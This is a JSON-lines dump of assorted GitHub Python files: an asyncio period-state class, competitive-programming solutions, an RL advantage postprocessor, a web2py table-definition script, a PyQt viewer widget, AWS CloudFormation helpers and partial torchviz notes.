+{"seq_id":"42446602896","text":"import asyncio\nimport datetime\n\n# todo 以后可以想想实现子集、并集、交集等,最小元素考虑是互斥时期\nfrom loguru import logger\n\n\nclass AsyncPeriod:\n def __init__(self, name, obj, gear):\n self._true_event = asyncio.Event()\n self._false_event = asyncio.Event()\n self._ensure_state(False)\n self._name = name\n self.obj = obj\n self.gear = gear\n\n self._slots_num_for_true = 1\n self._filled_slots_num = 0\n self._ensured_time = None\n\n @property\n def slots_num_for_true(self):\n return self._slots_num_for_true\n\n @slots_num_for_true.setter\n def slots_num_for_true(self, x: int):\n if self._slots_num_for_true != x: # 更新\n self.filled_slots_num = 0\n\n self._slots_num_for_true = x\n\n @property\n def filled_slots_num(self):\n return self._filled_slots_num\n\n @filled_slots_num.setter\n def filled_slots_num(self, x: int):\n self._filled_slots_num = x\n # 触发\n if self.filled_slots_num >= self.slots_num_for_true:\n self.gear.prev_period = self.gear.get_present_period()\n for period in self.gear.periods.values():\n period._ensure_state(period is self)\n self.gear._current_period = self\n logger.debug(f'set {repr(self.obj)} to period {self._name}.')\n\n self.filled_slots_num = 0\n\n def _ensure_state(self, state: bool):\n if state:\n if not self._true_event.is_set():\n self._true_event.set()\n self._ensured_time = datetime.datetime.utcnow()\n if self._false_event.is_set():\n self._false_event.clear()\n\n else:\n if self._true_event.is_set():\n 
self._true_event.clear()\n if not self._false_event.is_set():\n self._false_event.set()\n self._ensured_time = None\n\n def get_state(self):\n return self._true_event.is_set() and not self._false_event.is_set()\n\n async def wait_true(self):\n await asyncio.create_task(self._true_event.wait())\n\n async def wait_false(self):\n await asyncio.create_task(self._false_event.wait())\n\n async def wait_change_into_true(self):\n if self.get_state():\n await asyncio.create_task(self.wait_false())\n await asyncio.create_task(self.wait_true())\n else:\n await asyncio.create_task(self.wait_true())\n\n async def wait_change_into_false(self):\n if self.get_state():\n await asyncio.create_task(self.wait_false())\n else:\n await asyncio.create_task(self.wait_true())\n await asyncio.create_task(self.wait_false())\n\n # obj_has_async_exclusive_periods = {}\n #\n # @classmethod\n # def create_obj_periods(cls, obj, *period_names: str):\n # '''\n # Initially create periods for some object.\n #\n # :param obj:\n # :param period_names: Period names.The first one would be the initial period.\n # :return:\n # '''\n # if obj not in cls.obj_has_async_exclusive_periods.keys():\n # cls.obj_has_async_exclusive_periods[obj] = cls.obj_has_async_exclusive_periods.get(obj, {})\n # for period_name in period_names:\n # cls.obj_has_async_exclusive_periods[obj][period_name] = AsyncGear(period_name, obj)\n # cls._set_obj_period(obj, period_names[0])\n # else:\n # raise KeyError(f'{repr(obj)} has already got some periods! Please use add_period.')\n #\n # @classmethod\n # def add_period(cls, obj, new_period_name: str):\n # '''\n # Dynamically add a period for some object.\n #\n # :return:\n # '''\n # if obj not in cls.obj_has_async_exclusive_periods.keys():\n # cls.create_obj_periods(obj, new_period_name)\n # else:\n # cls.obj_has_async_exclusive_periods[obj][new_period_name] = AsyncGear(new_period_name, obj)\n #\n # @classmethod\n # def _get_obj_period(cls, obj, period_name: str):\n # if obj in cls.obj_has_async_exclusive_periods.keys() and \\\n # period_name in cls.obj_has_async_exclusive_periods[obj].keys():\n # return cls.obj_has_async_exclusive_periods[obj][period_name]\n # else:\n # raise KeyError(f'You did not create {period_name} for {repr(obj)}!')\n #\n # @classmethod\n # def get_obj_present_period(cls, obj):\n # for name, period in cls._get_obj_periods(obj).items():\n # if period._get_state():\n # return name\n #\n # @classmethod\n # def get_obj_period_names(cls, obj):\n # if obj in cls.obj_has_async_exclusive_periods.keys():\n # return cls.obj_has_async_exclusive_periods[obj].keys()\n # else:\n # raise KeyError(f'You did not create any AsyncGear for {repr(obj)}!')\n #\n # @classmethod\n # def _get_obj_periods(cls, obj):\n # if obj in cls.obj_has_async_exclusive_periods.keys():\n # return cls.obj_has_async_exclusive_periods[obj]\n #\n # @classmethod\n # def _set_obj_period(cls, obj, period_name: str):\n # if cls.get_obj_present_period(obj) != period_name:\n # for name, period in cls._get_obj_periods(obj).items():\n # # 目标\n # if name == period_name:\n # period._ensure_state(True)\n # else:\n # period._ensure_state(False)\n # logger.debug(f'set {repr(obj)} to period {period_name}.')\n #\n # @classmethod\n # async def set_obj_period(cls, obj, period_name: str, slot_num: int = 1):\n # '''\n # Set obj to period period_name.\n #\n # :param obj:\n # :param period_name:\n # :param slot_num: Attention! 
Do not use it if you do not understand it!\n # slot_num means that only after slot_num times AsyncGear.set_obj_period(obj,period_name,slot_num) run\n # (present time included), the period of obj gear could really be set to period_name, which is interrupted\n # if among these times set_obj_period run a different slot_num is given. Then the procedure is refreshed.\n # :return:\n # '''\n # p = cls._get_obj_period(obj, period_name)\n # p.slots_num_for_true = slot_num\n # p.filled_slots_num += 1\n #\n # # cls._set_obj_period(obj, period_name)\n # # if cls.get_obj_present_period(obj) != period_name:\n # # await asyncio.create_task(AsyncGear.wait_outside_period(obj, period_name))\n # # else:\n # # await asyncio.create_task(AsyncGear.wait_inside_period(obj, period_name))\n # # await asyncio.create_task(AsyncGear.wait_inside_period(obj, period_name))\n #\n # @classmethod\n # async def wait_inside_period(cls, obj, period_name: str):\n # period: cls = cls._get_obj_period(obj, period_name)\n # await asyncio.create_task(period._wait_true())\n #\n # @classmethod\n # async def wait_outside_period(cls, obj, period_name: str):\n # period: cls = cls._get_obj_period(obj, period_name)\n # await asyncio.create_task(period.wait_false())\n #\n # @classmethod\n # async def wait_enter_period(cls, obj, period_name: str):\n # period: cls = cls._get_obj_period(obj, period_name)\n # await asyncio.create_task(period.wait_change_into_true())\n #\n # @classmethod\n # async def wait_exit_period(cls, obj, period_name: str):\n # period: cls = cls._get_obj_period(obj, period_name)\n # await asyncio.create_task(period._wait_change_into_false())\n","repo_name":"monk-after-90s/AsyncGear","sub_path":"AsyncGear/AsyncPeriod.py","file_name":"AsyncPeriod.py","file_ext":"py","file_size_in_byte":7653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35687660478","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nsys.setrecursionlimit(100000)\r\n\r\nmemo = {}\r\ninput()\r\nshoes = [int(x) for x in input().split()]\r\n\r\ndef solve(i):\r\n if i in memo:\r\n return memo[i]\r\n if i < 0:\r\n ans = 0\r\n elif i == 0:\r\n ans = shoes[0]\r\n elif i == 1:\r\n ans = shoes[0] + shoes[1] - min(shoes[0], shoes[1]) / 2\r\n else:\r\n ans = min(solve(i - 1) + shoes[i], \\\r\n solve(i - 2) + shoes[i] + shoes[i - 1] - min(shoes[i], shoes[i - 1]) / 2, \\\r\n solve(i - 3) + shoes[i] + shoes[i - 1] + shoes[i - 2] - min(shoes[i], shoes[i - 1], shoes[i - 2]))\r\n memo[i] = ans\r\n return ans\r\n\r\nprint(\"{:.1f}\".format(solve(len(shoes) - 1)))","repo_name":"nathanlo99/dmoj_archive","sub_path":"done/dmopc16c1p3.py","file_name":"dmopc16c1p3.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1880614732","text":"\"\"\"\nEnvironment/VecEnvironment -> Episode (stacked or not) -> postprocessor -> offline dataset\n\"\"\"\nimport enum\nfrom typing import List\nimport numpy as np\nimport scipy.signal\n\nfrom malib.utils.typing import AgentID, Dict, PolicyID, Union, Callable\nfrom malib.utils.episode import Episode, EpisodeKey\nfrom malib.algorithm.common.policy import Policy\n\n\nclass PostProcessorType(enum.IntEnum):\n ADVANTAGE = 0\n GAE = 1\n ACCUMULATED_REWORD = 2\n\n\n# FIXME(ziyu): For loop for episodes at the beginning\ndef compute_acc_reward(\n episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n policy_dict: Dict[AgentID, Policy],\n) -> Dict[str, Dict[AgentID, np.ndarray]]:\n # create 
new placeholder\n    for episode in episodes:\n        # episode[EpisodeKey.ACC_REWARD] = {}\n\n        for aid, data in episode.items():\n            gamma = policy_dict[aid].custom_config[\"gamma\"]\n            assert isinstance(\n                data[EpisodeKey.REWARD], np.ndarray\n            ), \"Reward must be a numpy array: {}\".format(data[EpisodeKey.REWARD])\n            assert (\n                len(data[EpisodeKey.REWARD].shape) == 1\n            ), \"Reward should be a scalar at each time step: {}\".format(\n                data[EpisodeKey.REWARD]\n            )\n            acc_reward = scipy.signal.lfilter(\n                [1], [1, float(-gamma)], data[EpisodeKey.REWARD][::-1], axis=0\n            )[::-1]\n            data[EpisodeKey.ACC_REWARD] = acc_reward\n\n    return episodes\n\n\ndef compute_advantage(\n    episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n    policy_dict: Dict[AgentID, Policy],\n    last_r: Dict[AgentID, float],\n    use_gae: bool = False,\n) -> Dict[str, Dict[AgentID, np.ndarray]]:\n    episodes = compute_acc_reward(episodes, policy_dict)\n    for agent_episode in episodes:\n        for aid, policy in policy_dict.items():\n            episode = agent_episode[aid]\n            use_gae = policy.custom_config.get(\"use_gae\", False)\n            use_critic = policy.custom_config.get(\"use_critic\", False)\n\n            if use_gae:\n                gamma = policy.custom_config[\"gamma\"]\n                v = np.concatenate(\n                    [episode[EpisodeKey.STATE_VALUE], np.array([last_r[aid]])]\n                )\n                delta_t = episode[EpisodeKey.REWARD] + gamma * v[1:] - v[:-1]\n                episode[EpisodeKey.ADVANTAGE] = scipy.signal.lfilter(\n                    [1], [1, float(-gamma)], delta_t[::-1], axis=0\n                )[::-1]\n                episode[EpisodeKey.STATE_VALUE_TARGET] = (\n                    episode[EpisodeKey.ADVANTAGE] + episode[EpisodeKey.STATE_VALUE]\n                )\n            else:\n                v = np.concatenate(\n                    [episode[EpisodeKey.REWARD], np.array([last_r[aid]])]\n                )\n                acc_r = episode[EpisodeKey.ACC_REWARD]\n                if use_critic:\n                    episode[EpisodeKey.ADVANTAGE] = (\n                        acc_r - episode[EpisodeKey.STATE_VALUE]\n                    )\n                    episode[EpisodeKey.STATE_VALUE_TARGET] = episode[\n                        EpisodeKey.ACC_REWARD\n                    ].copy()\n                else:\n                    episode[EpisodeKey.ADVANTAGE] = episode[EpisodeKey.ACC_REWARD]\n                    episode[EpisodeKey.STATE_VALUE_TARGET] = np.zeros_like(\n                        episode[EpisodeKey.ADVANTAGE]\n                    )\n    return episodes\n\n\ndef compute_gae(\n    episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n    policy_dict: Dict[AgentID, Policy],\n) -> Dict[str, Dict[AgentID, np.ndarray]]:\n    last_r = {}\n    for agent_episode in episodes:\n        for aid, episode in agent_episode.items():\n            dones = episode[EpisodeKey.DONE]\n            if dones[-1]:\n                last_r[aid] = 0.0\n            else:\n                # compute value as last r\n                assert hasattr(policy_dict[aid], \"value_function\")\n                last_r[aid] = policy_dict[aid].value_function(episode, agent_key=aid)\n    episodes = compute_value(episodes, policy_dict)\n    episodes = compute_advantage(episodes, policy_dict, last_r=last_r, use_gae=True)\n    return episodes\n\n\ndef compute_value(\n    episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n    policy_dict: Dict[AgentID, Policy],\n):\n    for episode in episodes:\n        for aid, policy in policy_dict.items():\n            episode[aid][EpisodeKey.STATE_VALUE] = policy.value_function(**episode[aid])\n    return episodes\n\n\n# XXX(ming): require test\ndef copy_next_frame(\n    episodes: List[Dict[AgentID, Dict[str, np.ndarray]]],\n    policy_dict: Dict[AgentID, Policy],\n):\n    for episode in episodes:\n        for aid, agent_episode in episode.items():\n            assert EpisodeKey.CUR_OBS in agent_episode, (aid, episode)\n            agent_episode[EpisodeKey.NEXT_OBS] = agent_episode[\n                EpisodeKey.CUR_OBS\n            ].copy()\n\n            if EpisodeKey.ACTION_MASK in agent_episode:\n                agent_episode[EpisodeKey.NEXT_ACTION_MASK] = agent_episode[\n                    EpisodeKey.ACTION_MASK\n                ].copy()\n\n            if EpisodeKey.CUR_STATE in 
agent_episode:\n                agent_episode[EpisodeKey.NEXT_STATE] = agent_episode[\n                    EpisodeKey.CUR_STATE\n                ].copy()\n    return episodes\n\n\ndef default_processor(\n    episodes: List[Dict[str, Dict[AgentID, np.ndarray]]],\n    policy_dict: Dict[AgentID, Policy],\n) -> Dict[str, Dict[AgentID, np.ndarray]]:\n    return episodes\n\n\ndef get_postprocessor(\n    processor_types: List[\n        Union[str, Callable[[Episode, Dict[AgentID, Policy]], Episode]]\n    ]\n) -> Callable[[Episode, Dict[AgentID, Policy]], Episode]:\n    for processor_type in processor_types:\n        if callable(processor_type):\n            yield processor_type\n        # XXX(ming): we will allow heterogeneous processor settings\n        elif processor_type == \"gae\":\n            yield compute_gae\n        elif processor_type == \"acc_reward\":\n            yield compute_acc_reward\n        elif processor_type == \"advantage\":\n            yield compute_advantage\n        elif processor_type == \"default\":\n            yield default_processor\n        elif processor_type == \"value\":\n            yield compute_value\n        elif processor_type == \"copy_next_frame\":\n            yield copy_next_frame\n        else:\n            raise ValueError(\"Disallowed processor type: {}\".format(processor_type))\n","repo_name":"luorq3/malib","sub_path":"malib/rollout/postprocessor.py","file_name":"postprocessor.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"40881818965","text":"import sys\nx, y = map(int, sys.stdin.readline().split())\nz = (y*100)//x\n\nif z >= 99:\n    print(-1)\nelse:\n    answer = 0\n    l, r = 1, x\n    while l <= r:\n        mid = (l+r) // 2\n        if (y+mid)*100 // (x+mid) <= z:\n            l = mid + 1\n        else:\n            answer = mid\n            r = mid - 1\n\n    print(answer)\n","repo_name":"parkgr95/Algorithm-Baekjoon","sub_path":"PGR/1072.py","file_name":"1072.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13250825000","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ncreate_table_definition_file.py\n\nA script to create table definition files. An example table definition\nfile is:\n\n    applications//databases/07e0a7454f3966e22c43693c8e02ebc2_mystuff.table\n\nThis script is meant to be a template. 
Copy and edit before using.\n\"\"\"\nimport argparse\nimport logging\nimport sys\nimport traceback\nfrom pydal.base import BaseAdapter\nfrom pydal._compat import hashlib_md5, pjoin, pickle\nfrom pydal._load import portalocker\nfrom gluon.dal import Field, Table, SQLCustomType\nfrom applications.zcomx.modules.argparse.actions import ManPageAction\nfrom applications.zcomx.modules.logger import set_cli_logging\n\nVERSION = 'Version 0.1'\nLOG = logging.getLogger('root')\n\n\nclass DubBaseAdapter(BaseAdapter):\n    \"\"\"Class representing a DubBaseAdapter\"\"\"\n    # pylint: disable=missing-docstring\n\n    @classmethod\n    def ALLOW_NULL(cls):\n        # pylint: disable=invalid-name\n        return ''\n\n    @classmethod\n    def file_open(cls, filename, mode='rb', lock=True):\n        # to be used ONLY for files that on GAE may not be on filesystem\n        if lock:\n            fileobj = portalocker.LockedFile(filename, mode)\n        elif 'b' in mode:\n            # pylint: disable=consider-using-with\n            fileobj = open(filename, mode)  # binary mode takes no encoding argument\n        else:\n            # pylint: disable=consider-using-with\n            fileobj = open(filename, mode, encoding='utf-8')\n        return fileobj\n\n    @classmethod\n    def file_close(cls, fileobj):\n        # to be used ONLY for files that on GAE may not be on filesystem\n        if fileobj:\n            fileobj.close()\n\n\ndef get_ftype(table, field):\n    \"\"\"Get the ftype of a field.\"\"\"\n    # pylint: disable=protected-access\n    # pylint: disable=unused-variable\n    # pylint: disable=invalid-name\n    # pylint: disable=line-too-long\n    field_name = field.name\n    field_type = field.type\n    self = DubBaseAdapter\n    types = DubBaseAdapter.types\n    tablename = table._tablename\n    postcreation_fields = []\n    TFK = {}\n\n    if isinstance(field_type, SQLCustomType):\n        ftype = field_type.native or field_type.type\n    elif field_type.startswith(('reference', 'big-reference')):\n        if field_type.startswith('reference'):\n            referenced = field_type[10:].strip()\n            type_name = 'reference'\n        else:\n            referenced = field_type[14:].strip()\n            type_name = 'big-reference'\n\n        if referenced == '.':\n            referenced = tablename\n        constraint_name = self.constraint_name(tablename, field_name)\n        # if not '.' 
in referenced \\\n # and referenced != tablename \\\n # and hasattr(table,'_primarykey'):\n # ftype = types['integer']\n # else:\n try:\n rtable = db[referenced]\n rfield = rtable._id\n rfieldname = rfield.name\n rtablename = referenced\n except (KeyError, ValueError, AttributeError) as e:\n self.db.logger.debug('Error: %s' % e)\n try:\n rtablename, rfieldname = referenced.split('.')\n rtable = db[rtablename]\n rfield = rtable[rfieldname]\n except Exception as err:\n self.db.logger.debug('Error: %s', str(err))\n raise KeyError(\n 'Cannot resolve reference %s in %s definition' %\n (referenced, table._tablename)\n ) from err\n\n # must be PK reference or unique\n if getattr(rtable, '_primarykey', None) and rfieldname in rtable._primarykey or \\\n rfield.unique:\n ftype = types[rfield.type[:9]] % \\\n dict(length=rfield.length)\n # multicolumn primary key reference?\n if not rfield.unique and len(rtable._primarykey) > 1:\n # then it has to be a table level FK\n if rtablename not in TFK:\n TFK[rtablename] = {}\n TFK[rtablename][rfieldname] = field_name\n else:\n ftype = ftype + \\\n types['reference FK'] % dict(\n constraint_name=constraint_name, # should be quoted\n foreign_key=rtable.sqlsafe + ' (' + rfield.sqlsafe_name + ')',\n table_name=table.sqlsafe,\n field_name=field.sqlsafe_name,\n on_delete_action=field.ondelete)\n else:\n # make a guess here for circular references\n if referenced in db:\n id_fieldname = db[referenced]._id.sqlsafe_name\n elif referenced == tablename:\n id_fieldname = table._id.sqlsafe_name\n else: # make a guess\n id_fieldname = self.QUOTE_TEMPLATE % 'id'\n # gotcha: the referenced table must be defined before\n # the referencing one to be able to create the table\n # Also if it's not recommended, we can still support\n # references to tablenames without rname to make\n # migrations and model relationship work also if tables\n # are not defined in order\n if referenced == tablename:\n real_referenced = db[referenced].sqlsafe\n else:\n real_referenced = (referenced in db\n and db[referenced].sqlsafe\n or referenced)\n rfield = db[referenced]._id\n ftype_info = dict(\n index_name=self.QUOTE_TEMPLATE % (field_name + '__idx'),\n field_name=field.sqlsafe_name,\n constraint_name=self.QUOTE_TEMPLATE % constraint_name,\n foreign_key='%s (%s)' % (real_referenced, rfield.sqlsafe_name),\n on_delete_action=field.ondelete,\n )\n ftype_info['null'] = ' NOT NULL' if field.notnull else ''\n ftype_info['unique'] = ' UNIQUE' if field.unique else ''\n ftype = types[type_name] % ftype_info\n elif field_type.startswith('list:reference'):\n ftype = types[field_type[:14]]\n elif field_type.startswith('decimal'):\n precision, scale = list(map(int, field_type[8:-1].split(',')))\n ftype = types[field_type[:7]] % \\\n dict(precision=precision, scale=scale)\n elif field_type.startswith('geo'):\n if not hasattr(self, 'srid'):\n raise RuntimeError('Adapter does not support geometry')\n srid = self.srid\n geotype, parms = field_type[:-1].split('(')\n if geotype not in types:\n raise SyntaxError(\n 'Field: unknown field type: %s for %s'\n % (field_type, field_name))\n ftype = types[geotype]\n if self.dbengine == 'postgres' and geotype == 'geometry':\n if self.ignore_field_case is True:\n field_name = field_name.lower()\n # parameters: schema, srid, dimension\n dimension = 2 # GIS.dimension ???\n parms = parms.split(',')\n if len(parms) == 3:\n schema, srid, dimension = parms\n elif len(parms) == 2:\n schema, srid = parms\n else:\n schema = parms[0]\n ftype = \"SELECT AddGeometryColumn 
('%%(schema)s', '%%(tablename)s', '%%(fieldname)s', %%(srid)s, '%s', %%(dimension)s);\" % types[geotype]\n            ftype = ftype % dict(schema=schema,\n                                 tablename=tablename,\n                                 fieldname=field_name, srid=srid,\n                                 dimension=dimension)\n            postcreation_fields.append(ftype)\n    elif field_type not in types:\n        raise SyntaxError(\n            'Field: unknown field type: %s for %s' %\n            (field_type, field_name)\n        )\n    else:\n        ftype = types[field_type] % {'length':field.length}\n\n    if not field_type.startswith(('id', 'reference', 'big-reference')):\n        if field.notnull:\n            ftype += ' NOT NULL'\n        else:\n            ftype += self.ALLOW_NULL()\n        if field.unique:\n            ftype += ' UNIQUE'\n        if field.custom_qualifier:\n            ftype += ' %s' % field.custom_qualifier\n    return ftype\n\n\ndef man_page():\n    \"\"\"Print manual page-like help\"\"\"\n    print(\"\"\"\nOVERVIEW\n    This script can be used to create table definition files.\n    !! This script is meant to be a template. Copy and edit before using. !!\n\n    An example table definition file is:\n\n        applications//databases/07e0a7454f3966e22c43693c8e02ebc2_mystuff.table\n\n    This script will not work with py_web2py.sh\n\nUSAGE\n    !!! This script has hard coded values. Not intended to be used directly !!!\n\n    1. Copy this script to a temporary script; edit and use the temporary copy.\n    2. Update tablename.\n    3. Update the table definition, including all Field() definitions.\n    4. Remove all Field attributes *except*\n        name\n        type (string, integer, etc)\n        length\n        unique\n        notnull\n        ondelete\n        custom_qualifier\n\n    Then:\n    python web2py.py -S app -R applications/app/private/bin/tmp/tmp_create_table_definition_file.py\n\nOPTIONS\n\n    -h, --help\n        Print a brief help.\n\n    --man\n        Print man page-like help.\n\n    -v, --verbose\n        Print information messages to stdout.\n\n    -vv\n        More verbose. Print debug messages to stdout.\n\n    --version\n        Print the script version.\n    \"\"\")\n\n\ndef main():\n    \"\"\"Main processing.\"\"\"\n\n    parser = argparse.ArgumentParser(prog='create_table_definition_file.py')\n\n    parser.add_argument(\n        '--man',\n        action=ManPageAction, dest='man', default=False,\n        callback=man_page,\n        help='Display manual page-like help and exit.',\n    )\n    parser.add_argument(\n        '-v', '--verbose',\n        action='count', dest='verbose', default=False,\n        help='Print messages to stdout.',\n    )\n    parser.add_argument(\n        '--version',\n        action='version',\n        version=VERSION,\n        help='Print the script version'\n    )\n\n    args = parser.parse_args()\n\n    set_cli_logging(LOG, args.verbose)\n\n    db = None\n\n    app = 'app'                 # Replace with actual app name\n    tablename = 'tablename'     # Replace with actual table name\n    table = Table(\n        db,\n        tablename,\n        # Replace with actual Field() instances\n        # Remove unneeded attributes. 
See --man\n        Field('name'),\n        Field(\n            'another_table_id',\n            'integer',\n        ),\n        Field('time_stamp', 'datetime'),\n    )\n\n    sql_fields = {}\n\n    for sortable, field in enumerate(table, start=1):\n        field_name = field.name\n        field_type = field.type\n        ftype = get_ftype(table, field)\n        sql_fields[field_name] = dict(\n            length=field.length,\n            unique=field.unique,\n            notnull=field.notnull,\n            sortable=sortable,\n            type=str(field_type),\n            sql=ftype)\n\n    dbpath = 'applications/{a}/databases'.format(a=app)\n    adapter_uri = 'sqlite://{a}.sqlite'.format(a=app)\n\n    uri_hash = hashlib_md5(adapter_uri).hexdigest()\n    print('uri_hash: {var}'.format(var=uri_hash))\n\n    # pylint: disable=protected-access\n    table._dbt = pjoin(\n        dbpath, '%s_%s.table' % (uri_hash, tablename))\n    print('table._dbt: {var}'.format(var=table._dbt))\n\n    if table._dbt:\n        tfile = DubBaseAdapter.file_open(table._dbt, 'wb')\n        pickle.dump(sql_fields, tfile)\n        DubBaseAdapter.file_close(tfile)\n\n\nif __name__ == '__main__':\n    # pylint: disable=broad-except\n    try:\n        main()\n    except SystemExit:\n        pass\n    except Exception:\n        traceback.print_exc(file=sys.stderr)\n        sys.exit(1)\n","repo_name":"zcomx/zco.mx","sub_path":"applications/zcomx/private/bin/utils/create_table_definition_file.py","file_name":"create_table_definition_file.py","file_ext":"py","file_size_in_byte":11724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72460954967","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\n\nhtml_template = '''<html>\n    <head>\n        <title>{title}</title>\n        <meta name=\"author\" content=\"{author}\">\n    </head>\n    <body>\n    </body>\n</html>\n'''\n\nsite_name = input(\"Site name: \")\nauthor = input(\"Author: \")\nmake_js_dir = input(\"Do you want a folder for Javascript? \") == \"y\"\nmake_css_dir = input(\"Do you want a folder for CSS? \") == \"y\"\n\nos.mkdir(site_name)\n\nwith open(os.path.join(site_name, \"index.html\"), \"w\") as fp:\n    fp.write(html_template.format(title=site_name, author=author))\n\nif make_js_dir:\n    os.mkdir(os.path.join(site_name, \"js\"))\nif make_css_dir:\n    os.mkdir(os.path.join(site_name, \"css\"))\n","repo_name":"e0en/57_exercises","sub_path":"python/43_website_maker.py","file_name":"43_website_maker.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23217226586","text":"import numpy as np\nimport PyQt5\nfrom PyQt5.QtWidgets import (QApplication, QWidget,\n    QPushButton, QVBoxLayout, QHBoxLayout, QLabel, QFileDialog,\n    QDesktopWidget)\nfrom PyQt5.QtCore import QRect\nfrom PIL.ImageQt import ImageQt\nfrom PIL import Image\nfrom matplotlib.backends.backend_qt5agg import FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nimport pydicom\n\nclass MyWidget(QWidget):\n    def __init__(self):\n        super(MyWidget, self).__init__()\n        self.desk = QDesktopWidget()\n        self.screen_geo = self.desk.screenGeometry(0)\n        self.init_UI()\n        \n    def init_UI(self):\n        vbox = QVBoxLayout()\n        \n        self.file_label = QLabel(\"Filename: \")\n        self.file_btn = QPushButton(\"Choose file\")\n        self.track_btn = QPushButton(\"Reconstruct tracks\")\n        self.path_btn = QPushButton(\"Estimate paths\")\n        self.img_btn = QPushButton(\"Reconstruct image\")\n        \n        self.figure = Figure(figsize=(5, 3))\n        self.canvas = FigureCanvas(self.figure)\n        self.ax = self.figure.subplots()\n        ds = pydicom.dcmread(\"/home/g0/Projects/pct/image/imgs/cp600.dcm\")\n        image = self.ax.imshow(ds.pixel_array, cmap=plt.cm.bone) \n        # self.ax.set_axis_off()\n        \n        vbox.addWidget(self.file_label)\n        
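# The buttons sit above the embedded matplotlib canvas in the vertical layout.\n        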
vbox.addWidget(self.file_btn)\n vbox.addWidget(self.track_btn)\n vbox.addWidget(self.paht_btn)\n vbox.addWidget(self.img_btn)\n vbox.addWidget(self.canvas)\n \n self.file_btn.clicked.connect(self.set_filename)\n \n self.setLayout(vbox)\n \n def set_filename(self):\n fdialog = QFileDialog()\n print(self.screen_geo.width())\n fdialog.setGeometry(QRect(self.screen_geo.width()/4,\n self.screen_geo.height() /4,\n self.screen_geo.width()/2,\n self.screen_geo.height()/2))\n fname = fdialog.getOpenFileName(self, 'Open file', \n './',\"ROOT files (*.root)\")\n if fname[0]:\n self.file_label.setText(fname[0])\n ","repo_name":"arnon3339/singlechip-pct","sub_path":"app/modules/mywidgets.py","file_name":"mywidgets.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19320080932","text":"import os\n\nimport boto3\nimport botocore\n\n\ndef _stack_exists(stack_name):\n \"\"\" Checks if the stack exists.\n Returns True if it exists and False if not.\n \"\"\"\n cf = boto3.client('cloudformation')\n exists = False\n try:\n cf.describe_stacks(StackName=stack_name)\n exists = True\n except botocore.exceptions.ClientError as ex:\n if ex.response['Error']['Code'] == 'ValidationError':\n exists = False\n else:\n raise\n return exists\n\n\ndef create_stack(stack_name, template):\n \"\"\" Creates the stack given the template. \"\"\"\n if _stack_exists(stack_name):\n raise Exception(\"Stack exists, stack_name=%s\" % stack_name)\n cf = boto3.client('cloudformation')\n resp = cf.create_stack(StackName=stack_name, TemplateBody=template)\n return resp['StackId']\n\n\ndef update_stack(stack_name, template):\n \"\"\" Updates the stack with the updated template. \"\"\"\n if not _stack_exists(stack_name):\n raise Exception(\"Stack does not exists, stack_name=%s\" % stack_name)\n cf = boto3.client('cloudformation')\n resp = cf.update_stack(StackName=stack_name, TemplateBody=template)\n return resp['StackId']\n\n\ndef delete_stack(stack_name):\n \"\"\" Deletes the stack. \"\"\"\n if not _stack_exists(stack_name):\n raise Exception(\"Stack does not exists, stack_name=%s\" % stack_name)\n cf = boto3.client('cloudformation')\n cf.delete_stack(StackName=stack_name)\n","repo_name":"dsouzajude/troposphere-demo","sub_path":"tdemo/core/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70080602007","text":"#! python3\n# -*- coding: utf-8 -*-\n\"\"\"\n---\n# This is YAML, see: https://yaml.org/spec/1.2/spec.html#Preview\n# !!! 
YAML message always begins with ---\n\ntitle: PyTorchViz\nversion: 1.0\ntype: module\nkeywords: [pytorch, computation graph, visulisation, forward/backward pass]\ndescription: |\nremarks:\ntodo:\nsources:\n - title: PyTorchViz\n link: https://github.com/szagoruyko/pytorchviz\n description: A small package to create visualizations of PyTorch execution graphs\n - title: PyTorchViz examples\n link: https://colab.research.google.com/github/szagoruyko/pytorchviz/blob/master/examples.ipynb#scrollTo=spWKUcGvPdGv\nfile:\n usage:\n interactive: True\n terminal: False\n name: torchviz.py\n path: ~/Projects/AIML/NNRL/PytTorch/\n date: 2022-03-27\n authors:\n - nick: rcando\n fullname: Arkadiusz Kasprzyk\n email:\n - rcando@int.pl\n - arek@staart.pl\n\"\"\"\n\n#%%\nimport torch\nimport torch.nn as nn\nimport torchviz as tv\n\n#%%\ndir(tv) # dot, make_dot, make_dot_from_trace\nhelp(tv.dot)\n\"\"\"\nget_fn_name(fn, show_attrs, max_attr_chars)\n\nmake_dot(var, params=None, show_attrs=False, show_saved=False, max_attr_chars=50)\n\n Produces Graphviz representation of PyTorch autograd graph.\n\n If a node represents a _backward function_, it is gray.\n\n Otherwise, the node represents a tensor and is either blue, orange, or green:\n - Blue: reachable leaf tensors that requires grad (tensors whose `.grad`\n fields will be populated during `.backward()`)\n - Orange: saved tensors of custom autograd functions as well as those\n saved by built-in backward nodes\n - Green: tensor passed in as outputs\n - Dark green: if any output is a view, we represent its base tensor with\n a dark green node.\n\n Args:\n var: output tensor\n params: dict of (name, tensor) to add names to node that requires grad\n show_attrs: whether to display non-tensor attributes of backward nodes\n (Requires PyTorch version >= 